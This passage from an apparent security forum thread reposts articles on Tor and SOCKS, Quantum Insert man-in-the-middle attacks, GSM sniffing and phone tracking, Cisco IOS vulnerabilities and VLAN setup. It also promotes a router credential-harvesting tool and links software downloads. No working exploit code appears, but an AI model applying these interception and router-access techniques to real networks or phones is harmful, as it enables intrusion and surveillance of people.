protocol on any port. SOCKS Version 5 adds additional support for security and UDP. The SOCKS server does not interpret the network traffic between client and server in any way, and is often used because clients are behind a firewall and are not permitted to establish TCP connections to servers outside the firewall unless they do it through the SOCKS server. Most web browsers for example can be configured to talk to a web server via a SOCKS server. Because the client must first make a connection to the SOCKS server and communicate which host it wants to connect to, the client must be “SOCKS enabled”. SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make, and then acts as transparently as possible, whereas a regular proxy may interpret and rewrite headers. Comparison of SOCKS and HTTP As can be inferred from the above text about SOCKS, its function is similar to that of HTTP. But there is a significant difference between SOCKS and HTTP, as SOCKS operates at one level lower than HTTP proxying. HTTP allows forwarding TCP connections, whereas SOCKS can also forward UDP traffic and work in reverse. Let’s understand the difference with an example: SOCKS: Suppose User ‘A’ wants to connect with User ‘B’ over the Internet, but a firewall between them is restricting users to connect with each other. User ‘A’ connects to a SOCKS proxy in his network, which opens a connection through the firewall, and a communication channel between User ‘A’ and ‘B’ is achieved. HTTP: Suppose User ‘A’ wants to download a web page from web server ‘B’, but because of presence of a firewall between them, User ‘A’ is not able to do so, so User ‘A’ connects to an HTTP proxy, and in turn A’s browser communicates with the proxy in exactly the same way that it would directly with B’s server if that was possible, meaning it sends a standard HTTP request header. The HTTP proxy connects to B’s server, and then transmits back to ‘A’ any data that B’s server returns. TOR hidden services TOR is also being used to hide websites and other servers. This works by using what is called an associated onion address rather the website’s original IP address. This model is more secure than the original TOR model traffic, since hidden services do not use exit nodes. Communication is encrypted end to end. Below are some of the TOR hidden services. Search Engines: TorSearch P2P file sharing: The Pirate Bay Social Media: Facebook Commerce: Evolution, Silk Road etc. TOR weaknesses Although TOR is a strong way to anonymize activities in digital world, the TOR network has some weakness too. Below are some of the weakness that the TOR network has: The TOR network is subject to eavesdropping attack. Since the TOR model involves exit nodes and traffic from exit node to destination node is not encrypted, eavesdropping attacks are possible. One possible solution to this is to always access the HTTPS version of service. TOR exit node block: Some of the websites block traffic if the last node is a TOR node, thus reducing the functionalities for TOR users. TOR is also vulnerable to traffic analysis attack, correlation attack, sniper attack, etc. TOR configuration TOR can be easily installed in the system and after connecting with the TOR network, user can anonymize his activities. Consider the following commands to use in Ubuntu. Install TOR as root: apt-get install tor Check for IP address of the system without TOR Install TOR bundle from TOR website Extract the content and run the .exe If you are running as root, then the system might display an error by saying that “TOR cannot be run as root”. To overcome this, open the file in a text editor and comment the following lines: After this start, the TOR bundle .exe and notice the IP address. The IP address should not be the same as your machine’s IP. So in this article, we have learnt about what is TOR, how it is different from HTTP, and how easy it is to install and configure TOR in a machine. In the next article, we will learn about some more ways of anonymizing. References http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29 Source
  11. A Quantum Insert Attack is a classic example of man-in-the-middle attacks which resurfaced into news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread a malware which can work in tandem with a botnet C&C server. Understanding the attack The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained by Internet Service Providers and in the case of cyber espionage crimes, having access within a network looking to move laterally inside. This kind of attack is generally not used for large scale attacks, instead the attacker is very well aware of his target and most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better: Step 1: Step 2: Step 3: In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim. The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded. Simulating the attack To simulate the Quantum Insert attack, we would require three VMs: One VM will act as a victim Second VM will be used to monitor the traffic Third will be used to shoot a malicious payload to the victim. The proof-of-concept code for simulation is available to be downloaded here: Download hough the details of use for the script is given in the github page, let me re-iterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows: Victim visits mysite.com We need SYN+ACK of mysite.com On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. Shooter has a dependency on Scapy to craft packets (with its header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition. How real time QI works I. Foot printing Agencies like NSA and GCHQ catch hold of choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed as TURMOIL captures the network dumps and passes it to traffic analysis tools like Xkeyscore which automate the packet analysis. II. Build User Profiles Tools like Xkeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attacks. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years. III. Attack the target Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites. IV. Maintain access and persist Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to gain his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts. Detecting QI attacks QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But, both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values than the real packets because of the closer proximity of the attacker to the victim. Links for QI detection for snort: GitHub Links for QI PCAPS: GitHub References http://blog.fox-it.com Source
  12. Google launches its own mobile network for Nexus 6 owners Google is now a mobile carrier. Today the company has made official its plan to offer wireless service to owners of its Nexus 6 smartphone. It's called Project Fi, and Google is launching an early invite program beginning today. "Similar to our Nexus hardware program, Project Fi enables us to work in close partnership with leading carriers, hardware makers, and all of you to push the boundaries of what's possible," the company wrote in a blog post. The service is only available for the Nexus 6 and requires a special SIM card for Project FI — it will work with both existing Nexus 6 devices and new ones. Google is says that right now the service is only available as an "early access program," and during that program it won't work on other phones. Google's new offering is unique in that the company will charge consumers only for the data they use rather than hit them with a flat monthly fee that comes with a preset amount of data. If you fail to use all the data you've paid for, Google will refund you the difference. If you go over your plan, Google will simply charge you at a pro-rated rate of $10 per GB. In other words, if you pay for data and don't use it, you get refunded. If you don't buy data and use it, you end up paying the same amount. There are no family plans available, but neither does it require a contract of any kind. As reported previously, Google will operate its wireless service with the help of both T-Mobile and Sprint; customers will have access to both networks, and Google's service will intelligently switch between them and Wi-Fi to maintain strong reception. "We developed new technology that gives you better coverage by intelligently connecting you to the fastest available network at your location whether it's Wi-Fi or one of our two partner LTE networks," the company said. Project Fi also supports voice calls and texting over Wi-Fi, lending subscribers more flexibility and how and where they can communicate with their contacts. Google also says it's using secure tech (there's a key that shows up in your menu bar) for when you're using public Wi-Fi hotspots. Google says Project Fi phone numbers "live in the cloud," according to Google, enabling you to text and place voice calls from a laptop or tablet without your actual phone nearby. When you are on the phone, Google says calls can seamlessly transition to LTE when you leave a Wi-Fi network. Google seems to be using the new, combined Hangouts / Google Voice infrastructure in some way for Fi, as its FAQ references it often. If you're interested in being part of Google's mobile experiment, the signup page is here. Google says it'll be sending out a small number of invites every week starting now. Sursa: Google launches its own mobile network for Nexus 6 owners | The Verge
  13. zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.
  14. Introduction The Global System for Mobile Communication or GSM is a wireless communication that uses digital technology and is widely deployed across the globe for mobile communications, such as mobile phones. This technology utilizes microwaves, and its signal transmission is divided by time, mostly known as Time Division Multiple Access (TDMA). In this article, I will be discussing the method that could be used to see the traffic on a GSM network and how an attacker could abuse the GSM network. Mobile communication technology was already developed and widely used in the early 1980s. For the first time, the C-NET system was developed in Germany and Portugal by Siemens, the RC-2000 system was developed in France, and the NMT system was developed in the Netherlands and Scandinavia by Ericsson, as well as the TACS system which operates in the UK. GSM appeared in mid-1991 and eventually turned into mobile telecommunications standard for the whole of Europe, maintained by the ETSI (European Telecommunications Standards Institute) technical committee. GSM started its commercial operation at the beginning of the last quarter of 1992 because GSM is a complex technology and needed more assessment to be used as standard protocol. In September 1992, type approval standards for mobile agreed to consider and incorporate dozens of test items for GSM production. In Europe, GSM was originally designed to operate at the frequency of 900 MHz. In this frequency, the uplinks use frequencies between 890 MHz to 915 MHz, and frequency between 935 MHz to 960 MHz is used for downlinks. The bandwidth used is 25 MHz ((915 – 890) = (960 – 935) = 25 MHz), with a channel width of 200 kHz. GSM Network Architecture Typical GSM network architecture is divided into 3 parts: Mobile Station (MS) Base Station Sub-system (BSS) Network Sub-system (NSS) And all elements of the network at the top form a PLMN (Public Land Mobile Network). Picture 1. GSM network architecture. Mobile Station or MS is a device used by the customer for making phone calls. This device consists of: Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user’s or customer’s end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices. Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI). Mobile Subscriber ISDN (MSISDN). Encryption mechanism. Base Station System or BSS consists of: Base Transceiver Station (BTS) is a GSM device that is directly related to MS and serves as the sender and receiver. Base Station Controller (BSC) is a controller device for base stations located between the BTS and MSC. Network Sub System or NSS consists of: Mobile Switching Center (MSC) is a central network element in a GSM network. MSC works as the core of a cellular network, where MSC main role is for interconnection, both among the cellular or wired network PSTN or with the data network. Home Location Register (HLR) is a database that saves the data and customer information permanently. Visitor Location Register (VLR) is a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves. Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer. Equipment Identity Registration (EIR), is often integrated to the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones. GSM Layer There are 3 layers in the GSM network: Layer 1 or the physical layer, for setting the channels. Layer 2 or the data-link layer, whose main role is to identify the data that is sent from UM to BTS. Layer 3 consist of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC) that serves as a regulator for radio, mobile management and call control. Illustration of How GSM Works [mg]http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/031815_2231_Introductio2.png icture 2. Illustration of how GSM works. Mobile phone is input with the destination number and connects to the nearest BTS. BSC and BTS send to MSC to continue and proceed to the AuC for checking the user identification. MSC proceeds to the HLR / VLR to check the existence of mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile located. Problem The background of this issues lies in the GSM network. Due to leaking of the design of encryption in 1994, it could be attacked, such as sniffing the voice in an established communication. Attacking 1. Packet Analysis At this stage, the attacker will do packet analysis on one of GSM providers (for this example, the attacker will attack one of the service providers in Indonesia). The attacker is using multiple devices for packet analysis (Openmoko and Nokia 3310) and using Wireshark to dissect information used in GSM networks such as: Encryption used by the provider. ARFCN number. Location of the mobile phone, etc. The first step is that the attacker will analyze encryption used by the provider: Picture 3. A5/1 encryption used by the provider. In the picture above, the encryption used by the provider is A5/1. In the second packet, we could see the location in ARFCN, because ARFCN is determinant of the uplink and downlink signal to a GSM network. Picture 4. ARFCN (downlink) in use. From the above picture, we could see that the provider uses ARFCN 881. For more details, the frequency for ARFCN 881 is as follows: ARFCN: 881 Downlink frequency: 1879000000 Hz Uplink frequency: 1784000000 Hz Distance: 95000000 Hz Offset: 512 Band: GSM1800 (DCS 1800) It could be assumed that the provider uses encryption A5/1 and 1879000000 Hz frequency for downlink and 1784000000 Hz for uplink. However, ARFCN is not static in a communication. Picture 5. ARFCN calculation (GSM 1800) Picture 6. GSM900 frequency allocation in Indonesia. Picture 7. GSM1800 frequency allocation in Indonesia. 2. Authentication of a Communication When MS communicates to a BTS, MS identifies himself using IMSI and IMEI, and BSC to MSC communication to respond to IMSI. The authentication function is to assure that MS is a legitimate user. An illustration can be seen in the image below: Picture 8. MS Authentication flow. An explanation for the above picture is as follows: MS sends IMSI and IMEI to BSC. BSC requests IMSI and IMEI to MSC. MSC responds and sends RAND, SRES and Ki. BSC sends RAND to MS. MS responds with SRES’. BSC checks SRES’. 3. Kc Generation On A5/1 Picture 9. Kc generation on A5/1. The picture above shows the process of Kc generation before being used to send and receive a communication. RAND is a random number generated by the AuC when a customer makes a request authentication to the network. RAND isused to generate SRES and Kc. Ki is key authentication paired with IMSI when a SIM card is made. Ki only exists on the SIM card and the Authentication Center (AuC). Ki never get transmitted over the GSM network. A8 is an algorithm that’s being used to calculate Kc. Ki and RAND are inserted into the A8 algorithm and the result is Kc. The A8 algorithm exists on the SIM card and the AuC. Kc is the key used in the A5 encryption algorithm to write and decipher data that is being sent when communication occurred. 2. Sniffing GSM In Realtime In order to be able to sniff a GSM packet, you must have a hardware that works as a receiver. For example, the RTL-SDR with rtl2832 chip. However, this hardware has a limitation. The maximum packet capture is 16 kHz wide. In other words, not all GSM packets can be captured using this hardware. Picture 10. Sample packet captured with rtl2832 DVB (max 16 kHz). GSM uses 200 kHz for communication and it is divided into 8 slots (200 kHz / 8 = 25 kHz / slot). Picture 11. Downlink and uplink frame illustration. Before we could start capturing GSM packets, first we must know the ARFCN in use. One method that could be used to find out the ARFCN is by using Blackberry Engineering Mode. In order to use that feature, you can simply search for “blackberry engineering mode calculator“. After entering the engineering mode, you can see the ARFCN currently in use as you may see in this picture: Picture 12. Blackberry engineering mode (ARFCN 114). After knowing the ARFCN, we could proceed to capture the downlink packets. The capturing process could be seen in this picture (the result is not optimal due to a standard antenna being used): Picture 13. Sample captured with DVB (only to see the downlink frequency). From the above picture, we could see that the signal is not strong enough and it could increase the packets lost during capture period. Here’s an example of captured GSM packets using RTL-SDR and analyzed using Wireshark: Picture 14. Sample GSM packet captured using RTL-SDR and analyzed using Wireshark. Conclusion From the above explanation, we could conclude that communication through GSM exposes some security concerns. An attacker who understands how the GSM protocol works and has complete GSM standard documentation could find a way to attack the GSM networks, especially if security is poorly implemented. Source
  15. GSM or Global System for Mobile Communication is a technology that’s widely used in mobile communications, especially mobile phones. This technology utilizes microwave and signal transmission divided by time, so that the signal information sent will arrive at the destination. The GSM standard for mobile communications as well as mobile technology is deployed more than its counterparts around the world, like CDMA. At this time we will discuss how to track a cell phone by using the Doppler effect, in other words we will make it easier to know the whereabouts of a person just by having information such as cell phone numbers. GSM Network Architecture Typical GSM network architecture is divided into 3 parts: Mobile Station (MS) Base Station Sub-system (BSS) Network Sub-system (NSS) All elements of the network at the top form a PLMN (Public Land Mobile Network). Picture 1. GSM network architecture Mobile Station or MS is a device used by the customer for making phone calls. This device consists of: Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user or customer end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices. Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without a SIM in it, except for emergency calls. The data stored in the SIM in general are: International Mobile Subscriber Identity (IMSI) Mobile Subscriber ISDN (MSISDN) Encryption mechanism Base Station System or BSS consists of: Base Transceiver Station (BTS), a GSM device that is directly related to MS and serves as the sender and receiver. Base Station Controller (BSC), a controller device for base stations which is located between the BTS and MSC. Network Sub System or NSS consists of: Mobile Switching Center (MSC), a central network element in a GSM network. The MSC works as the core of a cellular network, where its main role is for interconnection, both among the cellular or wired network PSTN or with the data network. Home Location Register (HLR), a database that saves the data and customer information permanently. Visitor Location Register (VLR), a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves. Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer. Equipment Identity Registration (EIR), is often integrated to the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) which are to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones. GSM Layers There are 3 layers in the GSM network: Layer 1 or the physical layer, for setting the channels. Layer 2 or the data-link layer’s main role is to identify the data that is sent from UM to BTS. Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC) that serve as regulators for radio, mobile management and call control. Picture 2. Illustration of how GSM works Mobile phone is input with the destination number and connects to the nearest BTS. BSC and BTS sends to MSC and proceeds to AuC for checking the user identification. MSC proceeds to the HLR / VLR to check for the existence of the mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile located. How Doppler Works Doppler is a change in the frequency or wavelength of a wave source that is received by the observer. This is the Doppler effect formula which is not affected by wind: Doppler effect formula which is influenced by the wind: This is the illustration of Doppler effect: Picture 3. Doppler effect illust From the above picture, there are 3 persons: A, B and C. A is the person in the middle who could detect the source of the wave/sound from B or C. Because the wave/sound that came from B or C travels in a certain frequency and distance, the A person could distinct the source of the wave/sound. Concept In this article, we are proposing a GSM radar using the Doppler effect, where the Doppler effect itself will be used to listen for the mobile phone uplink. There are some literature and references that mention about the Doppler effect being used to identify a signal if the Doppler effect is combined with the right filter processing according to the signal characteristic being transmitted. Research 1. OpenBTS Installation This article won’t go further step by step on this OpenBTS installation until it could be used, because there are already a lot of tutorials which cover the installation process. For this research, we are using USRP N200 from Ettus Research. But as we proceed using OpenBTS with USRP N200, we realize that there is an anomaly in the signal transmitted by USRP N200. So, we are using a spectrum analyzer to figure out and find a solution for the signal anomaly. This is the setup we are using: Picture 4. Using spectrum analyzer to figure out USRP N200 signal anomaly Picture 5. Signal anomaly as seen on spectrum analyzer As you can see from the picture above, the signal generated by USRP N200 looks like a horn and the noise is quite high. The possible cause for that anomaly is USRP N200 clock is not accurate, and the solution for that is by adding a filter, so the final result will be a correct GSM modulation like this picture: Picture 6. Correct GSM modulation after adding a filter 2. Doppler Design After doing some research on Doppler design, we found out that some design is not capable for a frequency of 900 MHz, but we have a workaround and modified existing Doppler design so it capable of reaching 900 MHz and even higher. This is the block diagram for modified Doppler design (courtesy of Ramsey): Picture 7. Modified Doppler design Picture 8. Tracking mobile phone illustration Conclusion From the above explanation, we could conclude that the Doppler effect could be used to lookup the position of a device transmitting a signal in a certain frequency. We could take this research further to detect any kind of living creature (e.g. endangered species) that in some way is transmitting a signal in a certain frequency, as long as we have the sound sample of that creature. Source
  16. Router Scan is able to find and identify a variety of devices from a variety of known routers / routers, and most importantly - to pull out of them useful information, in particular the characteristics of the wireless network: a way to protect the access point (encryption), access point name (SSID) and key access point (passphrase). Also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router. Getting information occurs in two possible ways: the program will try to pick up a couple of login / password to the router from the list of standard passwords, resulting gain access. Or will be used non-destructive vulnerability (or bugs) for the router model, allowing to obtain the necessary information and / or to bypass the authorization process. TinyUpload.com - best file hosting solution, with no limits, totaly free pass: Stas'M Corp. Virus total https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/
  17. Cisco's turned up vulnerabilities in automation software that open the door to denial-of-service and limited access to devices. The company's Autonomic Network Infrastructure (ANI) feature in IOS provides self-management for various IPv6-supporting routers and Ethernet switches. One of the ANI features is to remove the need for pre-staging in network bootstrap, allowing devices join a network on start, so they can be configured over the network rather than through a local port. The three vulnerabilities exploit this in various ways: Registration authority spoofing (CVE-2015-0635) – insufficient validation of the Autonomic Networking (AN) response message allows an attacker to spoof the message, either bootstrapping a device into an untrusted domain (with limited control over it), DoS-ing the device, and disrupting the victim's domain; DoS using spoofed messages (CVE-2015-0636) – In IOS and IOS XE software, a spoofed “overloaded AN” message resets the state machine; Device reload (CVE-2015-0637) – received AN messages are insufficiently validated, allowing an attacker to trigger system reloads using crafted messages. Devices running Cisco IOS and IOS XE, with ANI enabled, are vulnerable. Cisco has released patches for the vulnerable systems listed in its advisory, here. Source
  18. This will be the shortest tut made by me because need only few changes. On the begin we will install VLAN packet. This will be done using command: # apt-get install vlan -y After this we will load 8021q module into the kernel using command; # sh -c 'grep -q 8021q /etc/modules || echo 8021q >> /etc/modules' Now the only thing required is to add VLANs into the /etc/network/interfaces file as next example: auto eth1 iface eth1 inet static address 192.168.0.101 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.254 dns-nameserver 8.8.8.8 # VLAN 69 auto vlan69 iface vlan69 inet static address 172.16.69.25 netmask 255.255.255.248 network 172.16.69.24 broadcast 172.16.69.31 vlan_raw_device eth2 # VLAN 96 auto vlan96 iface vlan96 inet static address 10.10.96.1 netmask 255.255.255.0 network 10.10.96.0 broadcast 10.10.96.255 mtu 1500 vlan_raw_device eth2 Now for the job to be done we will restart networking and all will be done # /etc/init.d/networking restart * Reconfiguring network interfaces... ssh start/running, process 1400 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 69 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1465 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 96 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1530 [ OK ] To check if are up we will read file vlan/config using command # cat /proc/net/vlan/config. The output will be the next if all is good. VLAN Dev name | VLAN ID Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD vlan69 | 69 | eth2 vlan96 | 96 | eth2 Author: razvan1@hy
  19. The Cisco Network Simulator, Router Simulator & Switch Simulator The Boson NetSim Network Simulator is an application that simulates Cisco Systems' networking hardware and software and is designed to aid the user in learning the Cisco IOS command structure. NetSim utilizes Boson's proprietary Network Simulator, Router Simulator® and EROUTER® software technologies, along with the Boson Virtual Packet Technology® engine, to create individual packets. These packets are routed and switched through the simulated network, allowing NetSim to build an appropriate virtual routing table and simulate true networking. Other simulation products on the market do not support this level of functionality. Source ? NetSim Cisco Network Simulator & Router Simulator Download ? GirlShare - Download Boson NetSim 8.0.rar
  20. Are you aware of everything that your users are accessing from your environment? While most of the time, non-work-related Internet browsing is harmless (looking at pictures of cats, online shopping, social media, etc.) there are some instances where you could be an unknowing and unwilling participant in criminal activity. That is, when users hide that activity via the Tor network, or the Dark Net. The Onion Router, better known as "Tor", an open source project, launched in 2002, is designed to allow a user to browse the Internet anonymously via a volunteer network of more than 5000 relays. It doesn't share your identifying information like your IP address and physical location with websites or service providers. A user that navigate Internet using Tor, it's quite difficult to trace its activities ensuring his online privacy. There are arguably legitimate uses for this technology, such as providing Internet access in repressively regulated countries. Tor has been a favorite target of intelligence agencies. NSA targeted the Tor users, using a zero-day vulnerability in Firefox browser, bundled with Tor, that allowed them to get the real IP address of the anonymous Tor users. Using same techniques, FBI was also able to track the Owner of 'Freedom Hosting', the biggest service provider for sites on the encrypted Tor network, hosted many child pornography sites. However, Mozilla has then fixed that Firefox flaw exploited by government law enforcement officials. Moreover, Tor is often associated with illicit activity (child pornography, selling controlled substances, identity theft, money laundering, and so on). Most admins will want to prohibit their users from using the Tor network due to its association with nefarious activity. Since the point of origin is nearly impossible to determine with conventional means, many bad actors leverage the Tor network to hide the location of Command & Control servers, machines taking ransomware payments, etc. This makes identifying these them and their malware that much harder. Users browsing the Tor network (for illicit purposes or not) from your environment can open you up to hosting malicious/illegal content, Ransomware infection, or unknowingly participating in other malicious activity. Therefore it is also known as DeepNet or Deep Web. To know more detail about the Deep Web you can read our detailed article, "What is the Deep Web? A first trip into the abyss". WHAT I CAN DO ABOUT TOR? AlienVault Unified Security ManagementTM (USM) can help. USM provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team. The correlation directives and IDS signatures in AlienVault Unified Security Management (USM) can detect when a system is attempting to resolve a Tor domain, and allow you to take corrective action. Plus, new & updated correlation directives developed by the experts at AlienVault Labs are pushed to USM weekly, enabling detection of emerging threats. Learn more about AlienVault USM: Download a free 30-day trial Watch a demo on-demand Play with USM in our product sandbox (no download required) Source
  21. Understanding Network Hacks Attack and Defense with Python Author: Bastian Ballmann Download: http://www.docdroid.net/rfpu/understanding-network-hacks.pdf.html
  22. Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet. Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere. NEW FEATURES The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features: Updated to Firefox to 31.5.0esr with important security updates. Update OpenSSL to 1.0.1 Update NoScript to 2.6.9.15 Update HTTPS-Everywhere to 4.0.3 BUG FIXES Meanwhile, the new Tor version 4.0.4 also include some bugfixes: Bug 14203: Prevent meek from displaying an extra update notification Bug 14849: Remove new NoScript menu option to make permissions permanent Bug 14851: Set NoScript pref to disable permanent permissions "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its network specialized servers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service. On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time. -> Sursa <-
  23. Introduction Last year – dubbed “the Year of the Hack” – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What’s wrong here? It seems likely that data traffic security and network security have not kept abreast with the technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc. Network Segmentation & Data Encryption Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for that data that traverse external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption ranging from Web-based/HTTPS encryption to SSL-based VPNs. Enhanced Security with Proper Network Segmentation a) Unauthorized network access can be limited through network segmentation or security “zoning”. This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network. At the same time, segregating the network properly will enable access to those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones. Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, “the ability to contain network problems, improve performance, and reduce congestion.” Diagram 1 “Example of Network Segmentation (Part 1)” Diagram 2 “Example of Network Segmentation (Part 2)” VLAN Network Segmentation and Security Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. A proper VLAN segmentation can hinder significantly threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily-manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient user mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location. What do the critics say about VLANs? VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management is concerned. That is because: “they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn’t always possible.” Next-Generation Networks Software Defined Networking (SDN), Network virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of entire network architecture. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies: Software Defined Networking (SDN) In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed: The centralized controller as a “potential single point of attack and failure.” The southbound interface between the controller and data-forwarding devices is “vulnerable to threats that could degrade the availability, performance and integrity of the network.” Measures within the SDN’s architecture: Secure the access to the Controller— protecting the Controller means protecting your SDN; Create a trusted network environment between the SDN Controller, the applications, the devices, which will protect the communications throughout the network; Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller; Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis). Security outside the architecture can be embedded either in servers, storage and other computing apparatuses. Network Functions Virtualization (NFV) There are two basic security threats for NFVs: 1) A combination of all generic visualization threats; 2) Threats specific to the network function software. However, virtualization gives some complementary security by eliminating or mitigating 